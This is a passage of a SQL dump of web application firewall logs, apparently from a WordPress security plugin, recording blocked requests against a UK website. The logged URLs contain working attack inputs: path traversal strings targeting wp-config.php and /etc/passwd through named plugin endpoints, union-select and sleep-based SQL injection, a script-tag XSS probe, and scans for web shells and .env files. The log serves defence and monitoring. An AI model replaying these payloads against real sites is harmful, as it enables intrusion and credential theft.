User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"LzMvbGljZW5zZS50eHQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(11932,1674602353.214360,1674602353.091400,'\0\0\0\0\0\0\0\0\0\0���+�',0,403,0,0,0,'https://dailyjolly.co.uk/wp-swimteam/include/user/download.php?file=%2Fetc%2Fpasswd&filename=..%2F..%2F..%2Fwp-config.php',NULL,'Go-http-client/1.1','blocked:waf','Directory Traversal (Requesting wp-config.php)','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlbmFtZV0=\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLXN3aW10ZWFtL2luY2x1ZGUvdXNlci9kb3dubG9hZC5waHA=\",\"category\":\"traversal\",\"ssl\":1}'),(11933,1674617571.355434,1674617571.226500,'\0\0\0\0\0\0\0\0\0\0��R�{',0,403,0,0,0,'https://dailyjolly.co.uk/30/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"LzMwL2xpY2Vuc2UudHh0\",\"category\":\"brute-force\",\"ssl\":1}'),(11934,1674634107.083820,1674634106.943100,'\0\0\0\0\0\0\0\0\0\0���1X7',0,403,0,0,0,'https://dailyjolly.co.uk/300/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"LzMwMC9saWNlbnNlLnR4dA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11935,1674650695.040454,1674650694.878700,'\0\0\0\0\0\0\0\0\0\0��b��',0,403,0,0,0,'https://dailyjolly.co.uk/@/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"L0AvbGljZW5zZS50eHQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(11936,1674660769.671930,1674660769.542000,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk//E0606.php?cpts=vz','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly9FMDYwNi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11937,1674660760.671850,1674660760.493200,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk//wp-plain.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly93cC1wbGFpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11938,1674660750.303999,1674660750.171100,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/E0606.php?cpts=vz','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0UwNjA2LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11939,1674660724.663598,1674660724.532800,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-plain.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLXBsYWluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11940,1674667378.868307,1674667378.729900,'\0\0\0\0\0\0\0\0\0\0��.��f',0,403,0,0,0,'https://dailyjolly.co.uk/A/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"L0EvbGljZW5zZS50eHQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(11941,1674674301.522275,1674674301.413700,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/a27de.php?cpts=vz','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2EyN2RlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11942,1674674289.307099,1674674289.186800,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-plain.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLXBsYWluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11943,1674674282.633829,1674674282.512900,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/a27de.php?cpts=vz','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2EyN2RlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11944,1674674240.317498,1674674240.208200,'\0\0\0\0\0\0\0\0\0\0���1',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-plain.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLXBsYWluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11945,1674684317.760799,1674684317.597500,'\0\0\0\0\0\0\0\0\0\0��N���',0,403,0,0,0,'https://dailyjolly.co.uk/About/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"L0Fib3V0L2xpY2Vuc2UudHh0\",\"category\":\"brute-force\",\"ssl\":1}'),(11946,1674688105.951551,1674688105.832800,'\0\0\0\0\0\0\0\0\0\0���+�#',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Go-http-client/1.1','blocked:waf','Directory Traversal (Requesting wp-config.php)','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlbmFtZV0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1lY29tbWVyY2Utc2hvcC1zdHlsaW5nL2luY2x1ZGVzL2Rvd25sb2FkLnBocA==\",\"category\":\"traversal\",\"ssl\":1}'),(11947,1674701753.538258,1674701753.334800,'\0\0\0\0\0\0\0\0\0\0���g�',0,403,0,0,0,'https://dailyjolly.co.uk/AboutUs/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"L0Fib3V0VXMvbGljZW5zZS50eHQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(11948,1674708099.198678,1674708098.780800,'\0\0\0\0\0\0\0\0\0\0���w��',0,403,0,0,0,'https://dailyjolly.co.uk/.env',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly5lbnY=\",\"category\":\"brute-force\",\"ssl\":1}'),(11949,1674711089.563585,1674711089.415300,'\0\0\0\0\0\0\0\0\0\0���&�',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/formidable/pro/js/ofc-library/ofc_upload_image.php',NULL,'ALittle Client','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"QUxpdHRsZSBDbGllbnQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9mb3JtaWRhYmxlL3Byby9qcy9vZmMtbGlicmFyeS9vZmNfdXBsb2FkX2ltYWdlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11950,1674719668.779395,1674719668.668100,'\0\0\0\0\0\0\0\0\0\0���B&',0,403,0,0,0,'https://dailyjolly.co.uk/Admin/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"L0FkbWluL2xpY2Vuc2UudHh0\",\"category\":\"brute-force\",\"ssl\":1}'),(11951,1674738050.761616,1674738050.630400,'\0\0\0\0\0\0\0\0\0\0����C�',0,403,0,0,0,'https://dailyjolly.co.uk/Administration/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"L0FkbWluaXN0cmF0aW9uL2xpY2Vuc2UudHh0\",\"category\":\"brute-force\",\"ssl\":1}'),(11952,1674743589.047212,1674743588.908100,'\0\0\0\0\0\0\0\0\0\0���+�',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2F..%2F..%2Fwp-config.php',NULL,'Go-http-client/1.1','blocked:waf','Directory Traversal (Requesting wp-config.php)','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cmxd\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1jdXN0b20tcGFnZXMvd3AtZG93bmxvYWQucGhw\",\"category\":\"traversal\",\"ssl\":1}'),(11953,1674745199.784397,1674745199.650900,'\0\0\0\0\0\0\0\0\0\0��>��S',0,403,0,0,0,'https://www.dailyjolly.co.uk/xleet-shell.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3hsZWV0LXNoZWxsLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11954,1674745186.956363,1674745186.826900,'\0\0\0\0\0\0\0\0\0\0��>��S',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/shell20211028.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvc2hlbGwyMDIxMTAyOC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11955,1674745153.765283,1674745153.636400,'\0\0\0\0\0\0\0\0\0\0��>��S',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/wp-class.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dwLWNsYXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11956,1674745135.603228,1674745135.473600,'\0\0\0\0\0\0\0\0\0\0��>��S',0,403,0,0,0,'https://www.dailyjolly.co.uk/wso112233.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dzbzExMjIzMy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11957,1674756402.785689,1674756402.653200,'\0\0\0\0\0\0\0\0\0\0����nt',0,403,0,0,0,'https://dailyjolly.co.uk/Archive/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"L0FyY2hpdmUvbGljZW5zZS50eHQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(11958,1674786580.826864,1674786580.703900,'\0\0\0\0\0\0\0\0\0\0���+��',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=..%2F..%2F..%2Fwp-config.php',NULL,'Go-http-client/1.1','blocked:waf','Directory Traversal (Requesting wp-config.php)','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t3cFBBVEhd\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b3JkdHViZS93b3JkdHViZS1idXR0b24ucGhw\",\"category\":\"traversal\",\"ssl\":1}'),(11959,1674796742.135780,1674796742.013100,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/admin-word-count-column/download-csv.php?path=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%5C0',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZFww\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hZG1pbi13b3JkLWNvdW50LWNvbHVtbi9kb3dubG9hZC1jc3YucGhw\",\"category\":\"traversal\",\"ssl\":1}'),(11960,1674796741.963793,1674796741.830200,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/cab-fare-calculator/tblight.php?controller=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&action=1&ajax=1',NULL,'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tjb250cm9sbGVyXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAA=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jYWItZmFyZS1jYWxjdWxhdG9yL3RibGlnaHQucGhw\",\"category\":\"traversal\",\"ssl\":1}'),(11961,1674796741.583742,1674796741.457500,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/?post_ids=0%29+union+select+md5%28999999999%29%2Cnull%2Cnull+--+g&rest_route=%2Fpvc%2Fv1%2Fincrease%2F1',NULL,'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twb3N0X2lkc10=\",\"paramValue\":\"MCkgdW5pb24gc2VsZWN0IG1kNSg5OTk5OTk5OTkpLG51bGwsbnVsbCAtLSBn\",\"path\":\"Lw==\",\"category\":\"sqli\",\"ssl\":1}'),(11962,1674796741.456271,1674796741.272700,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/options-general.php?page=smartcode',NULL,'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3NnY2dvb2dsZWFuYWx5dGljXQ==\",\"paramValue\":\"PHNjcmlwdD5jb25zb2xlLmxvZygiTnVjbGVpIC0gT3Blbi1zb3VyY2UgcHJvamVjdCBbZ2l0aHViLmNvbS9wcm9qZWN0ZGlzY292ZXJ5L251Y2xlaV0iKTwvc2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluL29wdGlvbnMtZ2VuZXJhbC5waHA=\",\"category\":\"xss\",\"ssl\":1}'),(11963,1674796741.037574,1674796740.903700,'\0\0\0\0\0\0\0\0\0\0���A��',0,403,0,0,0,'https://www.dailyjolly.co.uk/?item_id=0+union+select+sleep%285%29+--+g&rest_route=%2Fwc%2Fv3%2Fwishlist%2Fremove_product%2F1',NULL,'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36','blocked:waf','SQL 